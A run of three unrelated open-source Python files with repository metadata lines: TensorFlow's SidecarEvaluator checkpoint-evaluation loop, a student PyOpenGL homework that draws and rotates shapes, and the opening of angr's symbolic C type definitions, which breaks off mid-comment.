# Lint as: python3
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python module for evaluation loop."""
# pylint: disable=g-direct-tensorflow-import
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import checkpoint_utils
from tensorflow.python.training.tracking import util as tracking_util
_PRINT_EVAL_STEP_EVERY_SEC = 60.0
_ITERATIONS_UNINITIALIZED = -1
def list_checkpoint_attributes(ckpt_dir_or_file):
"""Lists all the attributes in a checkpoint.
Checkpoint keys are paths in a checkpoint graph, and attribute is the first
element in the path. e.g. with a checkpoint key
"optimizer/iter/.ATTRIBUTES/VARIABLE_VALUE", optimizer is the attribute. The
attribute is also used to save/restore a variable in a checkpoint,
e.g. tf.train.Checkpoint(optimizer=optimizer, model=model).
Args:
ckpt_dir_or_file: Directory with checkpoints file or path to checkpoint.
Returns:
Set of attributes in a checkpoint.
"""
reader = checkpoint_utils.load_checkpoint(ckpt_dir_or_file)
variable_map = reader.get_variable_to_shape_map()
return {name.split('/')[0] for name in variable_map.keys()}
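# Illustrative usage (a sketch; the checkpoint path is hypothetical):
#   attrs = list_checkpoint_attributes('/tmp/ckpt_dir/ckpt-1')
#   if 'model' not in attrs:
#       ...  # fall back to model.load_weights, as SidecarEvaluator.start does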
class SidecarEvaluator(object):
"""A class designed for a dedicated evaluator task.
`SidecarEvaluator` is expected to be run in a process on a separate machine
from the training cluster. It is meant for the purpose of a dedicated
evaluator, evaluating the metric results of a training cluster which has one
or more workers performing the training, and saving checkpoints.
The `SidecarEvaluator` API is compatible with both Custom Training Loop (CTL),
and Keras `Model.fit` to be used in the training cluster. Using the model
(with compiled metrics) provided at `__init__`, `SidecarEvaluator` repeatedly
performs evaluation "epochs" when it finds a checkpoint that has not yet been
used. Depending on the `steps` argument, an eval epoch is evaluation over all
  eval data, or up to a certain number of steps (batches). See examples below
  for
how the training program should save the checkpoints in order to be recognized
by `SidecarEvaluator`.
Since under the hood, `SidecarEvaluator` uses `model.evaluate` for evaluation,
it also supports arbitrary Keras callbacks. That is, if one or more callbacks
are provided, their `on_test_batch_begin` and `on_test_batch_end` methods are
called at the start and end of a batch, and their `on_test_begin` and
`on_test_end` are called at the start and end of an evaluation epoch. Note
that `SidecarEvaluator` may skip some checkpoints because it always picks up
the latest checkpoint available, and during an evaluation epoch, multiple
checkpoints can be produced from the training side.
Example:
```python
model = tf.keras.models.Sequential(...)
model.compile(metrics=tf.keras.metrics.SparseCategoricalAccuracy(
name="eval_metrics"))
data = tf.data.Dataset.from_tensor_slices(...)
SidecarEvaluator(
model=model,
data=data,
checkpoint_dir='/tmp/checkpoint_dir', # dir for training-saved checkpoint
steps=None, # Eval until dataset is exhausted
max_evaluations=None, # The evaluation needs to be stopped manually
callbacks=[tf.keras.callbacks.TensorBoard(log_dir='/tmp/log_dir')]
).start()
```
`SidecarEvaluator.start` writes a series of summary
files which can be visualized by tensorboard (which provides a webpage link):
```bash
$ tensorboard --logdir=/tmp/log_dir/validation
...
TensorBoard 2.4.0a0 at http://host:port (Press CTRL+C to quit)
```
If the training cluster uses a CTL, the `checkpoint_dir` should contain
checkpoints that track both `model` and `optimizer`, to fulfill
`SidecarEvaluator`'s expectation. This can be done by a
`tf.train.Checkpoint` and a `tf.train.CheckpointManager`:
```python
checkpoint_dir = ... # Same `checkpoint_dir` supplied to `SidecarEvaluator`.
checkpoint = tf.train.Checkpoint(model=model, optimizer=optimizer)
checkpoint_manager = tf.train.CheckpointManager(
checkpoint, checkpoint_dir=..., max_to_keep=...)
checkpoint_manager.save()
```
If the training cluster uses Keras `Model.fit` API, a
`tf.keras.callbacks.ModelCheckpoint` should be used, with
`save_weights_only=True`, and the `filepath` should have 'ckpt-{epoch}'
appended:
```python
checkpoint_dir = ... # Same `checkpoint_dir` supplied to `SidecarEvaluator`.
model_checkpoint = tf.keras.callbacks.ModelCheckpoint(
filepath=os.path.join(checkpoint_dir, 'ckpt-{epoch}'),
save_weights_only=True)
model.fit(dataset, epochs, callbacks=[model_checkpoint])
```
"""
def __init__(self,
model,
data,
checkpoint_dir,
steps=None,
max_evaluations=None,
callbacks=None):
"""Initializes an `SidecarEvaluator` object.
Args:
model: Model to use for evaluation. The model object used here should be a
`tf.keras.Model`, and should be the same as the one that is used in
training, where `tf.keras.Model`s are checkpointed. The model should
have one or more metrics compiled before using `SidecarEvaluator`.
data: The input data for evaluation. `SidecarEvaluator` supports all data
types that Keras `model.evaluate` supports as the input data `x`, such
as a `tf.data.Dataset`.
checkpoint_dir: Directory where checkpoint files are saved.
steps: Number of steps to perform evaluation for, when evaluating a single
checkpoint file. If `None`, evaluation continues until the dataset is
exhausted. For repeated evaluation dataset, user must specify `steps` to
avoid infinite evaluation loop.
max_evaluations: Maximum number of the checkpoint file to be evaluated,
for `SidecarEvaluator` to know when to stop. The evaluator will stop
after it evaluates a checkpoint filepath ending with
'<ckpt_name>-<max_evaluations>'. If using
`tf.train.CheckpointManager.save` for saving checkpoints, the kth saved
checkpoint has the filepath suffix '<ckpt_name>-<k>' (k=1 for the first
saved), and if checkpoints are saved every epoch after training, the
        filepath saved at the kth epoch would end with '<ckpt_name>-<k>'. Thus,
if training runs for n epochs, and the evaluator should end after the
training finishes, use n for this parameter. Note that this is not
necessarily equal to the number of total evaluations, since some
checkpoints may be skipped if evaluation is slower than checkpoint
creation. If `None`, `SidecarEvaluator` will evaluate indefinitely, and
the user must terminate evaluator program themselves.
callbacks: List of `keras.callbacks.Callback` instances to apply during
evaluation. See [callbacks](/api_docs/python/tf/keras/callbacks).
"""
self.model = model
self.data = data
self.checkpoint_dir = checkpoint_dir
self._iterations = variables.Variable(
name='iterations',
initial_value=_ITERATIONS_UNINITIALIZED,
dtype=dtypes.int64)
self.max_evaluations = max_evaluations
self.steps = steps
self.callbacks = callbacks or []
def start(self):
"""Starts the evaluation loop."""
optimizer_checkpoint = tracking_util.Checkpoint(iter=self._iterations)
checkpoint = tracking_util.Checkpoint(
model=self.model, optimizer=optimizer_checkpoint)
for latest_checkpoint in checkpoint_utils.checkpoints_iterator(
self.checkpoint_dir):
try:
# `expect_partial` because the checkpoint can have other `Trackable`s
# such as `optimizer`.
checkpoint.restore(latest_checkpoint).expect_partial()
checkpoint_attributes = list_checkpoint_attributes(latest_checkpoint)
        # The checkpoint should contain model and optimizer for SidecarEvaluator
        # to work. But the model weights saved by the ModelCheckpoint callback
        # do not contain the model as an attribute. To make SidecarEvaluator
        # work in this case as well, use model.load_weights to load the model's
        # weights, while self._iterations is still restored by the checkpoint
        # variable.
if 'model' not in checkpoint_attributes:
self.model.load_weights(latest_checkpoint)
# The model checkpoint might not include optimizer in cases, e.g.
# using a custom training loop. Directly assign the iterations
# property to be used in callbacks.
if self.model.optimizer:
self.model.optimizer.iterations.assign(self._iterations)
except (errors_impl.OpError,) as e:
# A couple errors can happen here with the coordinator racing to write
# checkpoint:
# 1) OpError: open failed for <file path>: No such file or directory
# 2) NotFoundError (subclass of OpError): Unsuccessful
# TensorSliceReader constructor.
# TODO(rchao): Remove this except block once b/150954027 is resolved.
logging.info(
'SidecarEvaluator has an error loading '
'checkpoint: %s. Retrying. Error: %s: %s', latest_checkpoint,
e.__class__.__name__, e)
continue
if self._iterations.numpy() == _ITERATIONS_UNINITIALIZED:
raise RuntimeError(
'`iterations` cannot be loaded from the '
'checkpoint file. Please ensure `iterations` is '
'tracked in the `checkpoint` saved by the coordinator.')
logging.info(
'Evaluation starts: Model weights loaded from latest '
'checkpoint file: %s.', latest_checkpoint)
self.model.evaluate(
self.data, steps=self.steps, callbacks=self.callbacks, verbose=2)
return_metrics = {}
for metric in self.model.metrics:
result = metric.result()
if isinstance(result, dict):
return_metrics.update(result)
else:
return_metrics[metric.name] = result
logging.info(
'End of evaluation. Metrics: %s', ' '.join([
'{}={}'.format(name, value.numpy())
for name, value in return_metrics.items()
]))
# TODO(rchao): Make the max evaluation robust in case users save the
# checkpoints with epoch format {epoch:03d}.
if (self.max_evaluations and
latest_checkpoint.endswith('-{}'.format(self.max_evaluations))):
# Exit the loop because we have evaluated the final checkpoint file.
logging.info('Last checkpoint evaluated. SidecarEvaluator stops.')
return
| tensorflow/tensorflow | tensorflow/python/keras/distribute/sidecar_evaluator.py | Python | apache-2.0 | 11,398 |
from OpenGL.GL import *
from OpenGL.GLUT import *
from OpenGL.GLU import *
import random as random
import numpy as np
import sys
fill, view = True, True
width, height = 1000, 1000
theta, sign = 0.0, 1.0
rotate = 0
ex = 0
ey = 0
ez = 8
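# camera eye position; adjusted at runtime with keys 1-6 and reset with key 7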
# triangle
obA = [ [3.0 , 0.0] ,[6.0, 0.0] , [4.5, 3.0] ]
# rectangle, given as two opposite corners
obB = [[3.0,0.0] ,[6.0, -3.0] ]
def InitGL():
glClearColor(0.0, 0.0, 0.0, 0.0)
glEnable(GL_DEPTH_TEST)
def SetGLScene():
if fill:
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
else:
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
glViewport(0, 0, width, height)
glMatrixMode(GL_PROJECTION)
glLoadIdentity()
if view:
gluPerspective(90., 1., 0.5, 80.)
else:
glOrtho(-10, 10, -10, 10, -10, 10)
#gluPerspective(90.0, float(width) / float(height), 0.1, 100.0)
#glMatrixMode(GL_MODELVIEW)
#glLoadIdentity()
#gluLookAt(0, 0, 8, 0, 0, 0, 0, 1, 0)
glMatrixMode(GL_MODELVIEW)
glLoadIdentity()
gluLookAt(ex, ey, ez, 0, 0, 0, 0, 1, 0)
def Surface(sx, sy, sz, r, g, b):
    # Note: relies on a global (m, n, 3) vertex array `sur` that is never
    # defined in this file, and expects r, g, b as single-element lists so
    # the colour can be mutated in place; this helper is currently unused.
    glBegin(GL_QUADS)
(m,n,o) = sur.shape
for i in range(m):
r[0] = r[0] + 0.1; b[0] = b[0] - 0.1
glColor3f(r[0], g[0], b[0])
for j in range(n):
glVertex3f(sur[i,j,0] + sx, sur[i,j,1] + sy, sur[i,j,2]+ sz)
glEnd()
def SetFrame():
glPushMatrix()
glBegin(GL_LINES)
glColor3f(1.0,0.0,0.0)
glVertex2f(-10.,0.)
glVertex2f( 10., 0.)
glColor3f(0.0,1.0,0.0)
glVertex2f( 0., -10.)
glVertex2f( 0., 10.)
glEnd()
glPopMatrix()
glPushMatrix()
glPolygonMode(GL_FRONT_AND_BACK,GL_LINE)
glBegin(GL_POLYGON)
glColor3f(0.5,0.0,0.0)
glVertex2f(-10,-10)
glVertex2f( -10, 10)
glVertex2f( 10, 10)
glVertex2f( 10, -10)
glEnd()
glPopMatrix()
def DrawGLScene():
glClearColor(0.0, 0.0, 0.0, 0.0)
glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)
SetFrame()
SetGLScene()
# drawing
glPushMatrix()
#glRotatef(random.random()*theta,0,1,0)
glBegin(GL_TRIANGLES)
glColor3f(random.random() , random.random() , random.random())
glVertex2f( obA[0][0] , obA[0][1])
glVertex2f(obA[1][0] , obA[0][1] )
glVertex2f(obA[2][0], obA[2][1])
glEnd()
glPopMatrix()
glPushMatrix()
#glPolygonMode(GL_FRONT_AND_BACK,GL_LINE)
glBegin(GL_POLYGON)
glVertex2f(obB[0][0], obB[0][1])
glVertex2f(obB[1][0] , obB[0][1])
glVertex2f(obB[1][0], obB[0][1])
glVertex2f(obB[1][0] , obB[1][1])
glVertex2f(obB[1][0], obB[1][1])
glVertex2f(obB[0][0] , obB[1][1])
glVertex2f(obB[0][0], obB[1][1])
glVertex2f(obB[0][0] , obB[0][1])
glEnd()
glPopMatrix()
# rotate and resize
glPushMatrix()
glRotatef(rotate,0,0,1)
glScalef(0.5,0.5,0.5)
#glTranslatef(0.0,0.0,0.0)
glBegin(GL_TRIANGLES)
glColor3f(random.random() , random.random() , random.random())
glVertex2f( obA[0][0] , obA[0][1])
glVertex2f(obA[1][0] , obA[0][1] )
glVertex2f(obA[2][0], obA[2][1])
glEnd()
glPopMatrix()
glPushMatrix()
glRotatef(rotate,0,0,1)
glScalef(0.5,0.5,0.5)
#glTranslatef(0.0,0.0,0.0)
#glPolygonMode(GL_FRONT_AND_BACK,GL_LINE)
glBegin(GL_POLYGON)
glVertex2f(obB[0][0], obB[0][1])
glVertex2f(obB[1][0] , obB[0][1])
glVertex2f(obB[1][0], obB[0][1])
glVertex2f(obB[1][0] , obB[1][1])
glVertex2f(obB[1][0], obB[1][1])
glVertex2f(obB[0][0] , obB[1][1])
glVertex2f(obB[0][0], obB[1][1])
glVertex2f(obB[0][0] , obB[0][1])
glEnd()
glPopMatrix()
# Make sure changes appear onscreen
glutSwapBuffers()
def On_keyboard(key, x, y):
    global ex, ey, ez
    global fill, view
    if key == b'\x1b':
        sys.exit()
    elif key == b'f':
        fill = not fill
    elif key == b'v':
        view = not view
    elif key == b'1':
        ex = ex + 1
    elif key == b'2':
        ex = ex - 1
    elif key == b'3':
        ey = ey + 1
    elif key == b'4':
        ey = ey - 1
    elif key == b'5':
        ez = ez + 1
    elif key == b'6':
        ez = ez - 1
    elif key == b'7':
        # reset the camera eye to its starting position
        ex, ey, ez = 0, 0, 7
    # `key` arrives as a bytes object under Python 3, so it cannot be
    # concatenated with a str; let print() format it instead
    print("key press", key)
    glutPostRedisplay()
def MyIdle():
    global theta, sign
    global rotate
    theta = theta + (0.2 * sign)
    if theta >= 360.0 or theta <= 0.0:
        sign = sign * (-1)
    if rotate < 270:
        rotate = rotate + 0.25
    glutPostRedisplay()
def On_reshape(w, h):
global width, height
width, height = w, h
def main():
glutInit(sys.argv)
glutInitWindowSize(width, height)
glutInitWindowPosition(0,0)
glutInitDisplayMode(GLUT_RGB | GLUT_DOUBLE | GLUT_DEPTH)
glutCreateWindow(b'cube')
InitGL()
glutDisplayFunc(DrawGLScene)
glutKeyboardFunc(On_keyboard)
glutReshapeFunc(On_reshape)
glutIdleFunc(MyIdle)
glutMainLoop()
if __name__ == "__main__":
main()
| dewtx29/python_ann | project/cg/homework/1_rotate_object.py | Python | gpl-3.0 | 5,874 |
from collections import OrderedDict, defaultdict
from .misc.ux import deprecated
import copy
import re
import logging
import claripy
l = logging.getLogger(name=__name__)
# pycparser hack to parse type expressions
errorlog = logging.getLogger(name=__name__ + ".yacc")
errorlog.setLevel(logging.ERROR)
try:
import pycparser
except ImportError:
pycparser = None
class SimType:
"""
SimType exists to track type information for SimProcedures.
"""
_fields = ()
_arch = None
_size = None
_can_refine_int = False
base = True
def __init__(self, label=None):
"""
:param label: the type label.
"""
self.label = label
def __eq__(self, other):
if type(self) != type(other):
return False
for attr in self._fields:
if attr == 'size' and self._arch is None and other._arch is None:
continue
if getattr(self, attr) != getattr(other, attr):
return False
return True
def __ne__(self, other):
# wow many efficient
return not self == other
def __hash__(self):
# very hashing algorithm many secure wow
out = hash(type(self))
for attr in self._fields:
out ^= hash(getattr(self, attr))
return out
@property
def name(self):
return repr(self)
def _refine_dir(self): # pylint: disable=no-self-use
return []
def _refine(self, view, k): # pylint: disable=unused-argument,no-self-use
raise KeyError("{} is not a valid refinement".format(k))
@property
def size(self):
"""
The size of the type in bits.
"""
if self._size is not None:
return self._size
return NotImplemented
@property
def alignment(self):
"""
The alignment of the type in bytes.
"""
if self._arch is None:
return NotImplemented
return self.size // self._arch.byte_width
def with_arch(self, arch):
if self._arch is not None and self._arch == arch:
return self
else:
return self._with_arch(arch)
def _with_arch(self, arch):
cp = copy.copy(self)
cp._arch = arch
return cp
def _init_str(self):
return "NotImplemented(%s)" % (self.__class__.__name__)
class SimTypeBottom(SimType):
"""
SimTypeBottom basically represents a type error.
"""
def __repr__(self):
return 'BOT'
def _init_str(self):
return "%s()" % self.__class__.__name__
class SimTypeTop(SimType):
"""
SimTypeTop represents any type (mostly used with a pointer for void*).
"""
_fields = ('size',)
def __init__(self, size=None, label=None):
SimType.__init__(self, label)
self._size = size
def __repr__(self):
return 'TOP'
class SimTypeReg(SimType):
"""
SimTypeReg is the base type for all types that are register-sized.
"""
_fields = ('size',)
def __init__(self, size, label=None):
"""
:param label: the type label.
:param size: the size of the type (e.g. 32bit, 8bit, etc.).
"""
SimType.__init__(self, label=label)
self._size = size
def __repr__(self):
return "reg{}_t".format(self.size)
def extract(self, state, addr, concrete=False):
# TODO: EDG says this looks dangerously closed-minded. Just in case...
assert self.size % state.arch.byte_width == 0
out = state.memory.load(addr, self.size // state.arch.byte_width, endness=state.arch.memory_endness)
if not concrete:
return out
return state.solver.eval(out)
def store(self, state, addr, value):
store_endness = state.arch.memory_endness
if isinstance(value, claripy.ast.Bits):
if value.size() != self.size:
raise ValueError("size of expression is wrong size for type")
elif isinstance(value, int):
value = state.solver.BVV(value, self.size)
elif isinstance(value, bytes):
store_endness = 'Iend_BE'
else:
raise TypeError("unrecognized expression type for SimType {}".format(type(self).__name__))
state.memory.store(addr, value, endness=store_endness)
class SimTypeNum(SimType):
"""
SimTypeNum is a numeric type of arbitrary length
"""
_fields = SimType._fields + ('signed', 'size')
def __init__(self, size, signed=True, label=None):
"""
:param size: The size of the integer, in bytes
:param signed: Whether the integer is signed or not
:param label: A label for the type
"""
super(SimTypeNum, self).__init__(label)
self._size = size
self.signed = signed
def __repr__(self):
return "{}int{}_t".format('' if self.signed else 'u', self.size)
def extract(self, state, addr, concrete=False):
out = state.memory.load(addr, self.size // state.arch.byte_width, endness=state.arch.memory_endness)
if not concrete:
return out
n = state.solver.eval(out)
if self.signed and n >= 1 << (self.size-1):
n -= 1 << (self.size)
return n
def store(self, state, addr, value):
store_endness = state.arch.memory_endness
if isinstance(value, claripy.ast.Bits):
if value.size() != self.size:
raise ValueError("size of expression is wrong size for type")
elif isinstance(value, int):
value = state.solver.BVV(value, self.size)
elif isinstance(value, bytes):
store_endness = 'Iend_BE'
else:
raise TypeError("unrecognized expression type for SimType {}".format(type(self).__name__))
state.memory.store(addr, value, endness=store_endness)
class SimTypeInt(SimTypeReg):
"""
SimTypeInt is a type that specifies a signed or unsigned C integer.
"""
_fields = SimTypeReg._fields + ('signed',)
_base_name = 'int'
def __init__(self, signed=True, label=None):
"""
:param signed: True if signed, False if unsigned
:param label: The type label
"""
super(SimTypeInt, self).__init__(None, label=label)
self.signed = signed
def __repr__(self):
name = self._base_name
if not self.signed:
name = 'unsigned ' + name
try:
return name + ' (%d bits)' % self.size
except ValueError:
return name
@property
def size(self):
if self._arch is None:
raise ValueError("Can't tell my size without an arch!")
try:
return self._arch.sizeof[self._base_name]
except KeyError:
raise ValueError("Arch %s doesn't have its %s type defined!" % (self._arch.name, self._base_name))
def extract(self, state, addr, concrete=False):
out = state.memory.load(addr, self.size // state.arch.byte_width, endness=state.arch.memory_endness)
if not concrete:
return out
n = state.solver.eval(out)
if self.signed and n >= 1 << (self.size-1):
n -= 1 << self.size
return n
def _init_str(self):
return "%s(signed=%s, label=%s)" % (
self.__class__.__name__,
self.signed,
'"%s"' % self.label if self.label is not None else "None",
)
def _refine_dir(self):
return ['signed', 'unsigned']
def _refine(self, view, k):
if k == 'signed':
ty = copy.copy(self)
ty.signed = True
elif k == 'unsigned':
ty = copy.copy(self)
ty.signed = False
else:
raise KeyError(k)
return view._deeper(ty=ty)
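    # Illustrative (a sketch, assuming angr's SimMemView): a memory view such
    # as state.mem[addr].int can be refined to state.mem[addr].int.unsigned,
    # which routes through _refine('unsigned') above.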
class SimTypeShort(SimTypeInt):
_base_name = 'short'
class SimTypeLong(SimTypeInt):
_base_name = 'long'
class SimTypeLongLong(SimTypeInt):
_base_name = 'long long'
class SimTypeChar(SimTypeReg):
"""
SimTypeChar is a type that specifies a character;
this could be represented by a byte, but this is meant to be interpreted as a character.
"""
def __init__(self, label=None):
"""
:param label: the type label.
"""
# FIXME: Now the size of a char is state-dependent.
SimTypeReg.__init__(self, 8, label=label)
self.signed = False
def __repr__(self):
return 'char'
def store(self, state, addr, value):
# FIXME: This is a hack.
self._size = state.arch.byte_width
try:
super(SimTypeChar, self).store(state, addr, value)
except TypeError:
if isinstance(value, bytes) and len(value) == 1:
value = state.solver.BVV(value[0], state.arch.byte_width)
super(SimTypeChar, self).store(state, addr, value)
else:
raise
def extract(self, state, addr, concrete=False):
# FIXME: This is a hack.
self._size = state.arch.byte_width
out = super(SimTypeChar, self).extract(state, addr, concrete)
if concrete:
return bytes([out])
return out
def _init_str(self):
return "%s(label=%s)" % (
self.__class__.__name__,
'"%s"' if self.label is not None else "None",
)
class SimTypeBool(SimTypeChar):
def __repr__(self):
return 'bool'
def store(self, state, addr, value):
return super(SimTypeBool, self).store(state, addr, int(value))
def extract(self, state, addr, concrete=False):
ver = super(SimTypeBool, self).extract(state, addr, concrete)
if concrete:
return ver != b'\0'
return ver != 0
def _init_str(self):
return "%s()" % (self.__class__.__name__)
class SimTypeFd(SimTypeReg):
"""
SimTypeFd is a type that specifies a file descriptor.
"""
_fields = SimTypeReg._fields
def __init__(self, label=None):
"""
:param label: the type label
"""
# file descriptors are always 32 bits, right?
# TODO: That's so closed-minded!
super(SimTypeFd, self).__init__(32, label=label)
def __repr__(self):
return 'fd_t'
class SimTypePointer(SimTypeReg):
"""
SimTypePointer is a type that specifies a pointer to some other type.
"""
_fields = SimTypeReg._fields + ('pts_to',)
def __init__(self, pts_to, label=None, offset=0):
"""
:param label: The type label.
:param pts_to: The type to which this pointer points to.
"""
super(SimTypePointer, self).__init__(None, label=label)
self.pts_to = pts_to
self.signed = False
self.offset = offset
def __repr__(self):
return '{}*'.format(self.pts_to)
def make(self, pts_to):
new = type(self)(pts_to)
new._arch = self._arch
return new
@property
def size(self):
if self._arch is None:
raise ValueError("Can't tell my size without an arch!")
return self._arch.bits
def _with_arch(self, arch):
out = SimTypePointer(self.pts_to.with_arch(arch), self.label)
out._arch = arch
return out
def _init_str(self):
return "%s(%s, label=%s, offset=%d)" % (
self.__class__.__name__,
self.pts_to._init_str(),
'"%s"' % self.label if self.label is not None else "None",
self.offset
)
class SimTypeFixedSizeArray(SimType):
"""
SimTypeFixedSizeArray is a literal (i.e. not a pointer) fixed-size array.
"""
def __init__(self, elem_type, length):
super(SimTypeFixedSizeArray, self).__init__()
self.elem_type = elem_type
self.length = length
def __repr__(self):
return '{}[{}]'.format(self.elem_type, self.length)
_can_refine_int = True
def _refine(self, view, k):
return view._deeper(addr=view._addr + k * (self.elem_type.size//view.state.arch.byte_width), ty=self.elem_type)
def extract(self, state, addr, concrete=False):
return [self.elem_type.extract(state, addr + i*(self.elem_type.size//state.arch.byte_width), concrete) for i in range(self.length)]
def store(self, state, addr, values):
for i, val in enumerate(values):
            self.elem_type.store(state, addr + i*(self.elem_type.size//state.arch.byte_width), val)
@property
def size(self):
return self.elem_type.size * self.length
@property
def alignment(self):
return self.elem_type.alignment
def _with_arch(self, arch):
out = SimTypeFixedSizeArray(self.elem_type.with_arch(arch), self.length)
out._arch = arch
return out
def _init_str(self):
return "%s(%s, %d)" % (
self.__class__.__name__,
self.elem_type._init_str(),
self.length,
)
class SimTypeArray(SimType):
"""
SimTypeArray is a type that specifies a pointer to an array; while it is a pointer, it has a semantic difference.
"""
_fields = ('elem_type', 'length')
def __init__(self, elem_type, length=None, label=None):
"""
:param label: The type label.
:param elem_type: The type of each element in the array.
:param length: An expression of the length of the array, if known.
"""
super(SimTypeArray, self).__init__(label=label)
self.elem_type = elem_type
self.length = length
def __repr__(self):
return '{}[{}]'.format(self.elem_type, '' if self.length is None else self.length)
@property
def size(self):
if self._arch is None:
raise ValueError("I can't tell my size without an arch!")
return self._arch.bits
@property
def alignment(self):
return self.elem_type.alignment
def _with_arch(self, arch):
out = SimTypeArray(self.elem_type.with_arch(arch), self.length, self.label)
out._arch = arch
return out
class SimTypeString(SimTypeArray):
"""
SimTypeString is a type that represents a C-style string,
i.e. a NUL-terminated array of bytes.
"""
_fields = SimTypeArray._fields + ('length',)
def __init__(self, length=None, label=None):
"""
:param label: The type label.
:param length: An expression of the length of the string, if known.
"""
super(SimTypeString, self).__init__(SimTypeChar(), label=label, length=length)
def __repr__(self):
return 'string_t'
def extract(self, state, addr, concrete=False):
if self.length is None:
out = None
last_byte = state.memory.load(addr, 1)
# if we try to extract a symbolic string, it's likely that we are going to be trapped in a very large loop.
if state.solver.symbolic(last_byte):
raise ValueError("Trying to extract a symbolic string at %#x" % state.solver.eval(addr))
addr += 1
while not (claripy.is_true(last_byte == 0) or state.solver.symbolic(last_byte)):
out = last_byte if out is None else out.concat(last_byte)
last_byte = state.memory.load(addr, 1)
addr += 1
else:
out = state.memory.load(addr, self.length)
if not concrete:
return out if out is not None else claripy.BVV(0, 0)
else:
return state.solver.eval(out, cast_to=bytes) if out is not None else ''
_can_refine_int = True
def _refine(self, view, k):
return view._deeper(addr=view._addr + k, ty=SimTypeChar())
@property
def size(self):
if self.length is None:
return 4096 # :/
return (self.length + 1) * 8
@property
def alignment(self):
return 1
def _with_arch(self, arch):
return self
class SimTypeWString(SimTypeArray):
"""
A wide-character null-terminated string, where each character is 2 bytes.
"""
_fields = SimTypeArray._fields + ('length',)
def __init__(self, length=None, label=None):
super(SimTypeWString, self).__init__(SimTypeNum(16, False), label=label, length=length)
def __repr__(self):
return 'wstring_t'
def extract(self, state, addr, concrete=False):
if self.length is None:
out = None
last_byte = state.memory.load(addr, 2)
# if we try to extract a symbolic string, it's likely that we are going to be trapped in a very large loop.
if state.solver.symbolic(last_byte):
raise ValueError("Trying to extract a symbolic string at %#x" % state.solver.eval(addr))
addr += 2
while not (claripy.is_true(last_byte == 0) or state.solver.symbolic(last_byte)):
out = last_byte if out is None else out.concat(last_byte)
last_byte = state.memory.load(addr, 2)
addr += 2
else:
out = state.memory.load(addr, self.length*2)
if out is None: out = claripy.BVV(0, 0)
if not concrete:
return out
else:
return u''.join(chr(state.solver.eval(x.reversed if state.arch.memory_endness == 'Iend_LE' else x)) for x in out.chop(16))
_can_refine_int = True
def _refine(self, view, k):
return view._deeper(addr=view._addr + k * 2, ty=SimTypeNum(16, False))
@property
def size(self):
if self.length is None:
return 4096
return (self.length * 2 + 2) * 8
@property
def alignment(self):
return 2
def _with_arch(self, arch):
return self
class SimTypeFunction(SimType):
"""
SimTypeFunction is a type that specifies an actual function (i.e. not a pointer) with certain types of arguments and
a certain return value.
"""
_fields = ('args', 'returnty')
base = False
def __init__(self, args, returnty, label=None, arg_names=None):
"""
:param label: The type label
:param args: A tuple of types representing the arguments to the function
:param returnty: The return type of the function, or none for void
"""
super(SimTypeFunction, self).__init__(label=label)
self.args = args
self.returnty = returnty
self.arg_names = arg_names if arg_names else []
def __repr__(self):
return '({}) -> {}'.format(', '.join(str(a) for a in self.args), self.returnty)
@property
def size(self):
return 4096 # ???????????
def _with_arch(self, arch):
out = SimTypeFunction([a.with_arch(arch) for a in self.args], self.returnty.with_arch(arch), self.label)
out._arch = arch
return out
def _init_str(self):
return "%s([%s], %s, label=%s)" % (
self.__class__.__name__,
", ".join([arg._init_str() for arg in self.args]),
self.returnty._init_str(),
self.label
)
class SimTypeLength(SimTypeLong):
"""
SimTypeLength is a type that specifies the length of some buffer in memory.
...I'm not really sure what the original design of this class was going for
"""
_fields = SimTypeNum._fields + ('addr', 'length') # ?
def __init__(self, signed=False, addr=None, length=None, label=None):
"""
:param signed: Whether the value is signed or not
:param label: The type label.
:param addr: The memory address (expression).
:param length: The length (expression).
"""
super(SimTypeLength, self).__init__(signed=signed, label=label)
self.addr = addr
self.length = length
def __repr__(self):
return 'size_t'
@property
def size(self):
if self._arch is None:
raise ValueError("I can't tell my size without an arch!")
return self._arch.bits
def _init_str(self):
return "%s(size=%d)" % (
self.__class__.__name__,
self.size
)
class SimTypeFloat(SimTypeReg):
"""
An IEEE754 single-precision floating point number
"""
def __init__(self, size=32):
super(SimTypeFloat, self).__init__(size)
sort = claripy.FSORT_FLOAT
signed = True
def extract(self, state, addr, concrete=False):
itype = claripy.fpToFP(super(SimTypeFloat, self).extract(state, addr, False), self.sort)
if concrete:
return state.solver.eval(itype)
return itype
def store(self, state, addr, value):
if type(value) in (int, float):
value = claripy.FPV(float(value), self.sort)
return super(SimTypeFloat, self).store(state, addr, value)
def __repr__(self):
return 'float'
class SimTypeDouble(SimTypeFloat):
"""
An IEEE754 double-precision floating point number
"""
def __init__(self, align_double=True):
self.align_double = align_double
super(SimTypeDouble, self).__init__(64)
sort = claripy.FSORT_DOUBLE
def __repr__(self):
return 'double'
@property
def alignment(self):
return 8 if self.align_double else 4
def _init_str(self):
return "%s(align_double=%s)" % (
self.__class__.__name__,
self.align_double
)
class SimStruct(SimType):
_fields = ('name', 'fields')
def __init__(self, fields, name=None, pack=False, align=None):
super(SimStruct, self).__init__(None)
        self._pack = pack
        self._name = '<anon>' if name is None else name
        self._align = align
self.fields = fields
self._arch_memo = {}
@property
def name(self): # required bc it's a property in the original
return self._name
@property
def offsets(self):
offsets = {}
offset_so_far = 0
for name, ty in self.fields.items():
if not self._pack:
align = ty.alignment
if offset_so_far % align != 0:
offset_so_far += (align - offset_so_far % align)
offsets[name] = offset_so_far
offset_so_far += ty.size // self._arch.byte_width
return offsets
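    # Illustrative (a sketch, not part of the original API): with fields
    # {'a': SimTypeChar(), 'b': SimTypeInt()} on a 32-bit arch with 8-bit
    # bytes and no packing, 'a' sits at offset 0 and 'b' is aligned up to
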